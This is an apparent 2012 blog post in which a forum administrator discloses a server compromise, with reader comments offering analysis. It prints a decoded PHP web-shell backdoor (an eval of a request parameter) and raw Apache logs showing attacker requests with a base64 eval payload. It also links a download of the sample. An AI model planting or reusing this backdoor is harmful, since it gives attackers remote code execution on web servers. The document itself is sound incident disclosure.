Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

14 comments:

  1. The people at http://code.google.com/p/malware-lu/ can probably help you out with the code!

    ReplyDelete
  2. I dunno why, but I love reading things in this format.

    ReplyDelete
  3. The Base64 string in the GET-request you shared contains: error_reporting(-1);set_time_limit(1800);ignore_user_abort(1);
    $paths = '/

    Send me the (complete) files you want to have decoded. (i.e. the rbvzv.php file.)

    Concerning the user agents, they may be spoofed but otherwise the attacker used Windows XP and Vista.

    In case you had phpmyadmin installed (and it was publicly accessible e.g. here http://forum.aircrack-ng.org/phpmyadmin/index.php ), it was most likely that application that was compromised.

    Unauthorized attackers often find critical vulnerabilities in this application or use well known that aren't patched to execute arbitrary code on the system.

    You can reach me at: owasp [don't add this] intern0t [remove this] net.


    Best regards,
    MaXe

    ReplyDelete
    Replies
    1. I was able to decode that part. Unfortunately, I only have what I posted here (I guess Apache truncated it) :/

      I don't have phpMyAdmin installed on any server for security reasons and I still have to figure out that first Apache log line.
      What I mean is that I'll check out if there are any other requests by that IP (and any other linked to that attack) and if there is anything else around that time.

      Delete
    2. There isn't much to know about the first line if you're 300% sure you don't have phpMyAdmin installed :-) Then the referrer is either just spoofed or they came from that URL when they sent that POST-request.
      I would instead try to look for references to that backdoor file, and find out if any other POST- or GET-request created it.

      If not, they could've gotten in other ways as well. If you use a VPS provider, the management interface could be insecure (Linode had this problem a while ago), where you could have the most secure server in the world, but still be compromised somewhat. (Of course there are ways to protect against that as well as you are most likely aware of.)

      I've tweeted you the decoded file, it seems pretty "basic", even though I've never seen encoding like that before. (I've seen more advanced examples often created with public tools, but this containing that much garbage data is quite interesting.)

      Delete
    3. I've got more, I'll create another post about it today.

      Delete
  4. a usable iframe exploit? o_O

    ReplyDelete
  5. Question is;
    Why & how were they able to upload a PHP file on your forum at the first place ?

    Did you MD5Sum/SHA1 your code ? If so, any changes ?

    ReplyDelete
    Replies
    1. I also have that question and I want to have the answer before I put the server back up.

      Yes, they did some changes to the PHP files, I'll post details about it today.

      Delete
  6. I recommend ZB Block. Written in php it is made to protect against such attacks. http://www.spambotsecurity.com/zbblock.php

    Give it a try.

    ReplyDelete
  7. hey all,

    I feel amazed from what i have just read but i didn't understand just a few lines of it .

    i feel like you are great and advanced people in that field, I'm at college at Computer Science Field, and Really hope to know what you are talking about can anyone here tell me the steps that i should follow to understand what you are talking about :)

    ReplyDelete